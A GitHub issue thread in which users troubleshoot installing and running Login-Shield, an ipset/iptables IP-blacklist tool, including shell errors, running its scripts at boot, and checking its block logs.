Comments (54)

DPsystems avatar DPsystems commented on August 26, 2024 1

Sorry, I missed this.

The errors you're getting appear to be the result of using the wrong shell. If you're using /bin/sh try /bin/bash or wherever your shell is located.

from login-shield.

aakerbeere avatar aakerbeere commented on August 26, 2024 1

thx DPsystems and ychaouche

I finally started over by running all the scripts from the INSTALL-Instructions as root, not only sudo.
This seems to have done it:

"
Continue (Y/n)?
Yes
Setting IPTABLES using ipset blacklist: login-shield for ports: 20,21,22,110,143,587,989,990,993,994,995,4190
iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j DROP
iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j LOG --log-prefix ShD-Lgn
"

and as well

"
ipset list | grep -i name
Name: login-shield
"

Happy now. Many thanks.

DPsystems avatar DPsystems commented on August 26, 2024 1

Thanks for helping diagnose this!

Yes, basically login-shield is manually enabled by default. I don't have it set up to automatically run when the server reboots. Since this is a system that has the potential to lock you out of remote server access, I feel by default I shouldn't hook it into startup, but once you test the system and make sure the blacklists you use are acceptable, then you can automate the process. I tend to manually reboot my servers, so I manually re-run the commands. I still consider the system in beta right now so it needs a bit more polish but really appreciate everybody helping!

aakerbeere avatar aakerbeere commented on August 26, 2024 1

thx
Nothing yet. I will report.

aakerbeere avatar aakerbeere commented on August 26, 2024 1

The line is actually uncommented on the device's local instance of ".../set-iptables.sh" but not on ".../set-iptables.sh-config"

ychaouche avatar ychaouche commented on August 26, 2024

24 days; no reply?

DPsystems avatar DPsystems commented on August 26, 2024

I believe the shell script I am using is bash. Run "whereis bash" and then execute that command before running the script, like /usr/bin/bash

aakerbeere avatar aakerbeere commented on August 26, 2024

got it thx

When adding blacklists I get, for example:

"
Blacklisting 96.127.128.0/18
ipset v6.38: Kernel support protocol versions 6-7 while userspace supports protocol versions 6-6
The set with the given name does not exist
"

Don't know if this is expected.

And when enabling I get

"
Running: set-iptables.sh

....

Continue (Y/n)?
Yes
Setting IPTABLES using ipset blacklist: login-shield for ports: 20,21,22,110,143,587,989,990,993,994,995,4190
iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j DROP
iptables v1.8.2 (nf_tables): Set login-shield doesn't exist.

Try `iptables -h' or 'iptables --help' for more information.
iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j LOG --log-prefix ShD-Lgn
iptables v1.8.2 (nf_tables): Set login-shield doesn't exist.

Try `iptables -h' or 'iptables --help' for more information.
Done.
"

Correct?

thx for helping

DPsystems avatar DPsystems commented on August 26, 2024

Before setting up iptables, you have to define the ipset lists. There must have been an error initially creating the ipset list? There's a specific order you need to run the commands in.

step 1: create the ipset list
step 2: run the blacklist* scripts to add IP to the blacklists
step 3: set iptables to use the ipset lists

maybe step 1 wasn't done?

aakerbeere avatar aakerbeere commented on August 26, 2024

I strictly followed the INSTALL-Instructions.
Should I start over?

DPsystems avatar DPsystems commented on August 26, 2024

Did you get an error message when running ./create-blacklist.sh?

Do you have ipset installed?

What do you get when you run the command: ipset list | grep -i name ?

There should be a set called "login-shield".

If there isn't something is going wrong creating the ipset list.

aakerbeere avatar aakerbeere commented on August 26, 2024

Did you get an error message when running ./create-blacklist.sh?
I don't remember. I would say no. Otherwise I would have been looking for it. Can I run the script again?

ipset/stable,now 6.38-1.2 arm64 [installed]

ipset list | grep -i name
ipset v6.38: Kernel error received: Operation not permitted
***@:~ $ sudo ipset list | grep -i name
->empty output

Many thanks for helping. I appreciate it.

aakerbeere avatar aakerbeere commented on August 26, 2024

Should I try to run all this being root, not only sudo?

DPsystems avatar DPsystems commented on August 26, 2024

Yes, all this stuff needs to be run as root.

DPsystems avatar DPsystems commented on August 26, 2024

By the way, when you run into stuff like this, be sure to identify what OS/version you're running.

DPsystems avatar DPsystems commented on August 26, 2024

The command (as root) you want to execute is:

ipset -exist create login-shield hash:net

It looks like the ipset list isn't being created for some reason.

ychaouche avatar ychaouche commented on August 26, 2024

@DPsystems did you pay attention to this error message?

ipset v6.38: Kernel support protocol versions 6-7 while userspace supports protocol versions 6-6

reference : #4 (comment)

aakerbeere avatar aakerbeere commented on August 26, 2024

Yes I did. Couldn't find helpful information about this yet. I actually don't know how to proceed.
thx

ychaouche avatar ychaouche commented on August 26, 2024

@aakerbeere it seems you have a version mismatch between what is supported in your kernel and what is used in the tools (ipset and/or iptables). Either a kernel upgrade or an application downgrade would be a possible solution.

ychaouche avatar ychaouche commented on August 26, 2024

There could have been a system update in the meantime that resolved the problem. Anyway, happy to hear it's working for you :)

aakerbeere avatar aakerbeere commented on August 26, 2024

One question remaining from INSTALL-Instructions:
"NOTE: This is not persistent unless you make it persistent."
and
"If you want to set up login-shield to run automatically at boot time, that's beyond the scope of this guide. But it's obviously not terribly difficult to do."

Does this mean "set-iptables.sh" has to be run at boot? If I'm right I will set up a crontab entry.

thx

ychaouche avatar ychaouche commented on August 26, 2024

You should run create-blacklist.sh, any number of blacklist-* scripts of your choice, and set-iptables.sh, in that order. You can put those in a single script and run that instead.

$ cat loginshield.sh
sudo ./create-blacklist.sh
# any number of these below
# sudo ./blacklist-main-nonUS.sh
# sudo ./blacklist-others.sh
# sudo ./blacklist-proxies.sh
# sudo ./blacklist-US-hosting.sh
sudo ./set-iptables.sh
$

You can either create a crontab entry for your script with the special @reboot time specification (not supported by all crontab versions), or simply call your script from /etc/rc.local which is executed after booting.

RobbieTheK avatar RobbieTheK commented on August 26, 2024

sudo ./create-blacklist.sh
any number of these below
sudo ./blacklist-main-nonUS.sh
sudo ./blacklist-others.sh
sudo./blacklist-proxies.sh
sudo ./blacklist-US-hosting.sh
sudo ./set-iptables.sh

Well you need to reference the full path to these files and then you have to create a way to automatically respond with "yes".

ychaouche avatar ychaouche commented on August 26, 2024

Maybe

# sudo has to wrap the script, not the echo, otherwise the script itself runs unprivileged
echo yes | sudo /path/to/create-blacklist.sh
echo yes | sudo /path/to/blacklist-main-nonUS.sh
echo yes | sudo /path/to/blacklist-others.sh
echo yes | sudo /path/to/blacklist-proxies.sh
echo yes | sudo /path/to/blacklist-US-hosting.sh
echo yes | sudo /path/to/set-iptables.sh

(not tested)

aakerbeere avatar aakerbeere commented on August 26, 2024

sry RobbieTheK

I accidentally submitted the comment.

thx ychaouche

I attempted to set it up using crontab. It didn't work. Probably the Raspberry's crontab does not support @reboot. So I set up "rc.local".
Actually the script looks like this:

#!/bin/sh -e
cd /usr/local/bin/Login-Shield-master
echo | ./create-blacklist.sh
echo | ./blacklist-main-nonUS.sh
echo | ./blacklist-others.sh
echo | ./blacklist-proxies.sh
echo | ./blacklist-US-hosting.sh
echo | ./set-iptables.sh
exit 0

Because the scripts affected need confirmation to continue, I needed each appropriate call to be preceded by "echo | ".
After reboot:

ipset list | grep -i name
Name: login-shield

So successfully set up "Login-Shield", or always missing something?

Thx to all spending time to help me.

ychaouche avatar ychaouche commented on August 26, 2024

You should be good I guess. I don't know if this is also another good way to check:

iptables -L --match-set login-shield

Where login-shield rules should be listed.

aakerbeere avatar aakerbeere commented on August 26, 2024

Raspberry must be using a different package.
I get

iptables v1.8.2 (nf_tables): unknown option "--match-set"

RobbieTheK avatar RobbieTheK commented on August 26, 2024

sudo echo yes | /path/to/create-blacklist.sh
sudo echo yes | /path/to/blacklist-main-nonUS.sh
sudo echo yes | /path/to/blacklist-others.sh
sudo echo yes | /path/to/blacklist-proxies.sh
sudo echo yes | /path/to/blacklist-US-hosting.sh
sudo echo yes | /path/to/set-iptables.sh

Well you have to then edit each blacklist* script with the correct/full path to the respective ipset* script otherwise you get:

#######
#
Adding ./ipset-main-nonUS.lst to the login-shield blacklist, which contains cat: ./ipset-main-nonUS.lst: No such file or directory
0 IP blocks.
head: cannot open './ipset-main-nonUS.lst' for reading: No such file or directory
Yes
/root/Login-Shield/blacklist-main-nonUS.sh: line 56: ./ipset-main-nonUS.lst: No such file or directory
## end.
#######
#
Adding ./ipset-others.lst to the login-shield blacklist, which contains cat: ./ipset-others.lst: No such file or directory
0 IP blocks.
head: cannot open './ipset-others.lst' for reading: No such file or directory
Yes
/root/Login-Shield/blacklist-others.sh: line 54: ./ipset-others.lst: No such file or directory

aakerbeere avatar aakerbeere commented on August 26, 2024

Having some doubt I did some further investigation and found

systemctl status rc-local.service
● rc-local.service - /etc/rc.local Compatibility
   Loaded: loaded (/etc/systemd/system/rc-local.service; enabled-runtime; vendor preset: enabled)
  Drop-In: /lib/systemd/system/rc-local.service.d
           └─debian.conf
           /etc/systemd/system/rc-local.service.d
           └─ttyoutput.conf
   Active: failed (Result: exit-code) since Wed 2021-04-28 21:04:36 CEST; 30s ago
  Process: 3556 ExecStart=/etc/rc.local start (code=exited, status=2)

Apr 28 21:04:36 rpi4nc systemd[1]: Starting /etc/rc.local Compatibility...
Apr 28 21:04:36 rpi4nc rc.local[3556]: ./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found
Apr 28 21:04:36 rpi4nc rc.local[3556]: ./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" une
Apr 28 21:04:36 rpi4nc systemd[1]: rc-local.service: Control process exited, code=exited, status=2/INVALIDARGUMENT
Apr 28 21:04:36 rpi4nc systemd[1]: rc-local.service: Failed with result 'exit-code'.
Apr 28 21:04:36 rpi4nc systemd[1]: Failed to start /etc/rc.local Compatibility.

and in "syslog"

Apr 28 21:04:36 localhost systemd[1]: Starting /etc/rc.local Compatibility...
Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found
Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" unexpected (expecting "then")
Apr 28 21:04:36 localhost systemd[1]: rc-local.service: Control process exited, code=exited, status=2/INVALIDARGUMENT
Apr 28 21:04:36 localhost systemd[1]: rc-local.service: Failed with result 'exit-code'.
Apr 28 21:04:36 localhost systemd[1]: Failed to start /etc/rc.local Compatibility.

So this does not seem to run as expected.

RobbieTheK avatar RobbieTheK commented on August 26, 2024

Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found
Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" unexpected (expecting "then")

Put the full path to the file, e.g., echo yes | /root/Login-Shield/blacklist-main-nonUS.sh

DPsystems avatar DPsystems commented on August 26, 2024

Looks like a shell/reference issue. I believe the scripts were written using bash.

aakerbeere avatar aakerbeere commented on August 26, 2024

I did some changes to "/etc/rc.local":

#!/bin/bash
cd /usr/local/bin/Login-Shield-master
/usr/local/bin/Login-Shield-master/create-blacklist.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-main-nonUS.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-others.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-proxies.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-US-hosting.sh
echo | /usr/local/bin/Login-Shield-master/set-iptables.sh
exit 0

then I get

# systemctl status rc-local.service
Warning: The unit file, source configuration file or drop-ins of rc-local.service changed on disk. Run 'systemctl daemon-reload' to reload units.
● rc-local.service - /etc/rc.local Compatibility
   Loaded: loaded (/etc/systemd/system/rc-local.service; enabled-runtime; vendor preset: enabled)
  Drop-In: /lib/systemd/system/rc-local.service.d
           └─debian.conf
           /etc/systemd/system/rc-local.service.d
           └─ttyoutput.conf
   Active: active (exited) since Wed 2021-04-28 22:04:39 CEST; 37s ago
  Process: 667 ExecStart=/etc/rc.local start (code=exited, status=0/SUCCESS)

Apr 28 22:04:37 ****** systemd[1]: Starting /etc/rc.local Compatibility...
Apr 28 22:04:38 ****** rc.local[667]: ipset v6.38: Kernel support protocol versions 6-7 while userspace supports protocol versions 6-6
Apr 28 22:04:38 ****** rc.local[667]: Element cannot be added to the set: it's already added
Apr 28 22:04:39 ****** systemd[1]: Started /etc/rc.local Compatibility.

When doing systemctl daemon-reload the warning disappears but does not survive reboot. And again there is a strange Kernel support protocol versions confusion.

aakerbeere avatar aakerbeere commented on August 26, 2024

So I configured this as a service. After reboot I get

# systemctl status loginshield.service
● loginshield.service - Login-Shield service
   Loaded: loaded (/etc/systemd/system/loginshield.service; enabled; vendor preset: enabled)
   Active: inactive (dead) since Wed 2021-04-28 23:37:56 CEST; 49s ago
  Process: 655 ExecStart=/usr/local/bin/Login-Shield-master/loginshield.sh (code=exited, status=0/SUCCESS)
 Main PID: 655 (code=exited, status=0/SUCCESS)

Apr 28 23:37:56 rpi4nc loginshield.sh[655]: #  This script will enable the LOGIN-SHIELD IP blacklist via IPTABLES
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: #
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: # WARNING:  This can cause you to lose connectivity to your server if not properly configured!
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: #
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: Yes
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: Setting IPTABLES using ipset blacklist: login-shield for ports: 20,21,22,110,143,587,989,990,993,994,995,4190
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j DROP
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j LOG --log-prefix ShD-Lgn
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: ## Done.
Apr 28 23:37:56 rpi4nc systemd[1]: loginshield.service: Succeeded.

I guess the inactive (dead) output is expected because the script comes to a successful end and then terminates, and there is nothing more to do.

Maybe successful this time?

DPsystems avatar DPsystems commented on August 26, 2024

I don't know. I've never configured it as a service before. Sounds interesting... let us know how it works!

ychaouche avatar ychaouche commented on August 26, 2024

Status=0/SUCCESS

  Process: 655 ExecStart=/usr/local/bin/Login-Shield-master/loginshield.sh (code=exited, status=0/SUCCESS)
 Main PID: 655 (code=exited, status=0/SUCCESS)

Also pay attention to this line :

Apr 28 22:04:38 ****** rc.local[667]: Element cannot be added to the set: it's already added

This probably means you have run the script once and it succeeded adding the ruleset, then you ran it again? I don't know if @DPsystems has code to detect that; on the other hand maybe the consequences aren't so important and can be safely ignored. But it's always better to have a clean, deterministic and consistent way to run the script, i.e. we should be covering as many cases and outcomes as possible.

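One way to put the three steps ychaouche listed (create the set, load the blacklists, set iptables) into a single boot script that is also safe to re-run by hand, so neither the "already added" message nor stacked duplicate iptables rules turn up. This is an added example, not code from the Login-Shield project; it assumes the checkout lives in LS_DIR and that the project's scripts accept an empty stdin line as confirmation, as the `echo |` pipe in this thread relies on. The function names, the DRY_RUN switch and the BLACKLISTS list are this example's own.

```shell
#!/bin/bash
# Added example (not part of Login-Shield): idempotent boot script for the three setup steps.
# DRY_RUN=1 prints the commands instead of executing them, so the plan can be reviewed
# without root and without ipset/iptables installed.
set -eu

LS_DIR="${LS_DIR:-/usr/local/bin/Login-Shield-master}"   # assumed checkout location
SET_NAME="${SET_NAME:-login-shield}"
BLOCK_PORTS="${BLOCK_PORTS:-20,21,22,110,143,587,989,990,993,994,995,4190}"
LOG_PREFIX="${LOG_PREFIX:-ShD-Lgn}"
BLACKLISTS="${BLACKLISTS:-blacklist-main-nonUS.sh blacklist-others.sh}"  # pick your own
DRY_RUN="${DRY_RUN:-0}"

# Execute a command, or just print it when DRY_RUN=1.
run() {
    if [ "$DRY_RUN" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# Step 1: the set must exist before any blacklist script or iptables rule refers to it
# (otherwise you get "Set login-shield doesn't exist"). -exist makes a re-run a no-op.
create_set() {
    run ipset -exist create "$SET_NAME" hash:net
}

# Step 2: the blacklist scripts open ./ipset-*.lst relative to the working directory, so
# run them from LS_DIR; the empty echo answers their "Continue (Y/n)?" prompt.
load_blacklists() {
    for script in $BLACKLISTS; do
        ( cd "$LS_DIR" && echo | run "./$script" )
    done
}

# Step 3 helper: iptables -C exits 0 when an identical rule is already present.
rule_present() {
    iptables -C INPUT -p tcp --match multiport --dports "$BLOCK_PORTS" \
        -m set --match-set "$SET_NAME" src "$@" 2>/dev/null
}

# Insert a rule only when it is missing, so running this at every boot (or twice by hand)
# never stacks duplicate rules.
ensure_rule() {
    if [ "$DRY_RUN" = "1" ] || ! rule_present "$@"; then
        run iptables -I INPUT -p tcp --match multiport --dports "$BLOCK_PORTS" \
            -m set --match-set "$SET_NAME" src "$@"
    fi
}

# Step 3: same order as set-iptables.sh: DROP first, then LOG. Both use -I, so the LOG
# rule ends up above DROP and fires before the packet is dropped.
set_rules() {
    ensure_rule -j DROP
    ensure_rule -j LOG --log-prefix "$LOG_PREFIX"
}

# Verification that works on nf_tables-backed iptables, where "iptables -L --match-set"
# is rejected as an unknown option: list the INPUT rules that reference the set.
show_rules() {
    iptables -S INPUT | grep -F -- "--match-set $SET_NAME" || echo "no $SET_NAME rules installed"
}

# Only act when explicitly asked ("apply"), so sourcing or testing this file changes nothing.
if [ "${1:-}" = "apply" ]; then
    create_set
    load_blacklists
    set_rules
    show_rules
fi
```

Run it as root with `apply` from a systemd unit or rc.local; `DRY_RUN=1 ./loginshield.sh apply` shows the exact commands first.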
aakerbeere avatar aakerbeere commented on August 26, 2024

@ychaouche: Because I was looking for a way to have this done automatically at boot time, the scripts have been run multiple times. So, this was expected.

@DPsystems: Raspberry Pi Documentation indicates some possible drawbacks that I was probably suffering from when trying the "rc.local" method. As well, there I found the hint for the "systemd" method. With this I don't have any of the issues I got before with "rc.local".

But even if this is running without errors, I don't know if iptables does some blocking. Can I verify somehow, for example via logfiles?

thx for spending time. I appreciate it.

ychaouche avatar ychaouche commented on August 26, 2024

The set-iptables.sh script already has the necessary LOG instructions:

[...]
LOG_PREFIX="ShD-Lgn"
[...]
  echo "iptables -I INPUT -p tcp --match multiport --dports $BLOCK_PORTS -m set --match-set $SET_NAME src -j LOG --log-prefix $LOG_PREFIX"
  # optional command to LOG dropped connections via the kern.warning syslog service.  Comment out the iptables to disable
  iptables -I INPUT -p tcp --match multiport --dports $BLOCK_PORTS -m set --match-set $SET_NAME src -j LOG --log-prefix $LOG_PREFIX

You should look for syslog lines prefixed with ShD-Lgn

$ grep ShD-Lgn /var/log/syslog

ychaouche avatar ychaouche commented on August 26, 2024

Is this device running any popular web-facing services? (ssh, ftp, imap, pop3, smtp, http, https)

aakerbeere avatar aakerbeere commented on August 26, 2024

Yes, private Cloud.
ssh, https

DPsystems avatar DPsystems commented on August 26, 2024

By default, the system logs all blocks. There are two shell scripts that will report on the status of things if properly configured to look in the appropriate logs (see attack_stats.sh and count_logins.sh)

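A small stand-alone way to check that the LOG rule is actually producing entries, following ychaouche's `grep ShD-Lgn` hint and the per-IP counts that attack_stats.sh reports. This is an added example, not one of the Login-Shield scripts; the log lines it runs on are constructed (documentation address ranges), and the function names are this example's own.

```shell
#!/bin/sh
# Added example (not part of Login-Shield): summarise the kernel LOG lines written by the
# "-j LOG --log-prefix ShD-Lgn" rule. Pass a syslog file as the first argument
# (e.g. /var/log/messages or /var/log/syslog); with no argument it runs on a constructed sample.

LOG_PREFIX="${LOG_PREFIX:-ShD-Lgn}"

# Constructed sample. Note the prefix runs straight into "IN=": the rule on this page uses
# --log-prefix ShD-Lgn with no trailing space. The UFW and sshd lines show what must be ignored.
SAMPLE='May  1 02:23:16 rpi4nc kernel: [25003.117303] ShD-LgnIN=eth0 OUT= MAC=dc:a6:32:00:00:01:00:11:22:33:44:55:08:00 SRC=203.0.113.7 DST=192.168.1.10 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=51234 DPT=22 WINDOW=65535 RES=0x00 SYN URGP=0
May  1 02:23:18 rpi4nc kernel: [25005.003101] ShD-LgnIN=eth0 OUT= MAC=dc:a6:32:00:00:01:00:11:22:33:44:55:08:00 SRC=203.0.113.7 DST=192.168.1.10 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=51240 DPT=22 WINDOW=65535 RES=0x00 SYN URGP=0
May  1 02:40:02 rpi4nc kernel: [26009.511000] ShD-LgnIN=eth0 OUT= MAC=dc:a6:32:00:00:01:00:11:22:33:44:55:08:00 SRC=198.51.100.23 DST=192.168.1.10 LEN=60 TOS=0x00 PREC=0x00 TTL=48 ID=0 DF PROTO=TCP SPT=40001 DPT=587 WINDOW=29200 RES=0x00 SYN URGP=0
May  1 02:41:10 rpi4nc kernel: [26077.117303] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:00:00:fb:00:08:9b:c5:82:77:08:00 SRC=192.168.1.10 DST=224.0.0.251 LEN=32 TOS=0x00 PREC=0xC0 TTL=1 ID=0 DF PROTO=2
May  1 02:41:11 rpi4nc sshd[1234]: Failed password for invalid user admin from 203.0.113.7 port 51299 ssh2'

# Only the lines written by the Login-Shield LOG rule (stdin -> stdout).
blocked_lines() {
    grep -F 'kernel:' | grep -F -- "$LOG_PREFIX"
}

# Number of blocked packets.
blocked_total() {
    blocked_lines | wc -l | tr -d ' '
}

# Number of distinct source addresses that were blocked.
unique_sources() {
    blocked_lines | grep -oE 'SRC=[0-9.]+' | sort -u | wc -l | tr -d ' '
}

# "count ip" per source, busiest first (the Top 20 table of attack_stats.sh).
top_sources() {
    blocked_lines | grep -oE 'SRC=[0-9.]+' | cut -d= -f2 \
        | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

# "count port" per destination port, to see which of the listed ports draws traffic.
ports_hit() {
    blocked_lines | grep -oE 'DPT=[0-9]+' | cut -d= -f2 \
        | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

# Full report; buffers stdin once so each helper can re-read it.
report() {
    data=$(cat)
    echo "Blocked packets      : $(printf '%s\n' "$data" | blocked_total)"
    echo "Unique source IPs    : $(printf '%s\n' "$data" | unique_sources)"
    echo "Top sources (count ip):"
    printf '%s\n' "$data" | top_sources
    echo "Ports hit (count port):"
    printf '%s\n' "$data" | ports_hit
}

if [ "$#" -gt 0 ]; then
    report < "$1"
else
    printf '%s\n' "$SAMPLE" | report
fi
```

If the report stays at zero while the set is populated, the port you actually expose is not in the dports list or the rule is not installed, which is exactly what turned out to be the case further down this thread.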
aakerbeere avatar aakerbeere commented on August 26, 2024

thx

$ sudo /usr/local/bin/Login-Shield-master/attack_stats.sh
...
======= Attack Statistics based on current log files =======
 Using: /var/log/messages Key: ShD-

From: Apr 25 00:00:06
To  : Apr 30 19:10:45

-- Number of blocked attacks in log files  : 0
-- Number of unique IP addresses attacking : 0
   Average # of attacks per IP             : -2147483647
   Percentage of attacks from top 50 IPs   : nan%
   Percentage of attacks from top 10 IPs   : nan%
   Percentage of attacks from top 5 IPs    : nan%

      Top 20:
Attacks:  IP Address:
---------------------

$ sudo /usr/local/bin/Login-Shield-master/count_logins.sh

...

============= Login-Shield Statistics based on current log files ===========
 Using: /var/log/messages and /var/log/secure
-- Number of login failures in log files: 0
Start: End  : ===================================== 
--        Number of filtered connections: 0
Start: Apr 25 00:00:06 localhost rsyslogd:  [origin software="rsyslogd" swVersion="8.1901.0" x-pid="442" x-info="https://www.rsyslog.com"] rsyslogd was HUPed
End  : Apr 30 19:14:55 localhost kernel: [25003.117303] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:00:00:fb:00:08:9b:c5:82:77:08:00 SRC=192.168.1.10 DST=224.0.0.251 LEN=32 TOS=0x00 PREC=0xC0 TTL=1 ID=0 DF PROTO=2 
============================================================================
Total system attacks: 0
Blocked attempts    : 0
Attacks got through : 0
---------------------------------
% Of Attacks Blocked: 100% 
============================================================================

DPsystems avatar DPsystems commented on August 26, 2024

Hmmm, make sure there are log entries in the file it's looking for (and that the prefix "ShD" is prepended to those entries according to the iptables command). I've only tested this under CentOS 7, so the logging may be slightly different for other OSes.
I guess it's also possible that different systems will log failed logins differently than what I might have in the script.

aakerbeere avatar aakerbeere commented on August 26, 2024

Thank you DPsystems

"/var/log/messages" was already present but no entries with 'ShD'-prefix, "/var/log/secure" was not. I created it (actually empty).
Login attempts are recorded in '/var/log/auth.log'

aakerbeere avatar aakerbeere commented on August 26, 2024

I realized creating "/var/log/secure" was useless.

aakerbeere avatar aakerbeere commented on August 26, 2024

I actually discovered plenty of connections in "/var/log/apache2/other_vhosts_access.log"


Don't know what to think of.

DPsystems avatar DPsystems commented on August 26, 2024

Note that unless you're blocking ports 80/443, Login-Shield by default isn't stopping web attacks.

HOWEVER, I AM working on another version called "Web-Shield" with a different set of blacklists to address this issue. I've been testing it now for months and I'm pretty close to making it available.

I think ideally, the web defense needs to be separate from the login-defense. To block web attacks you primarily want to block the web ports from servers, not users, so it needs a bit of a different IP database.

DPsystems avatar DPsystems commented on August 26, 2024

If you're still having issues, remember to note the version/OS you're using. See if you can confirm iptables is logging the blocked requests and what form those log entries are appearing as?

ychaouche avatar ychaouche commented on August 26, 2024

@aakerbeere did you uncomment this line? Otherwise login-shield won't block anything.

ychaouche avatar ychaouche commented on August 26, 2024

@aakerbeere ssh on port 22?

aakerbeere avatar aakerbeere commented on August 26, 2024

I use a different port.

ychaouche avatar ychaouche commented on August 26, 2024

Ah, then that's why you don't get anything logged. Add that port to the list (same line). As @DPsystems mentioned, web traffic isn't being monitored, and when I asked about the publicly available services you only mentioned ssh and http. Since http is ruled out, you only have ssh to care about, but you didn't give the correct port number in the config file. Add the relevant port number and re-run.

aakerbeere avatar aakerbeere commented on August 26, 2024

Done, ssh ok.
When preparing I was afraid to lock myself out. But actually I understand this only to be the case if my public IP is covered by one of the blacklists in use.
thx

ychaouche avatar ychaouche commented on August 26, 2024

Which it totally could, yeah. This makes me think this system has to have a whitelist of some sort, which it apparently doesn't. You can add it by hand, but I can't help on this.
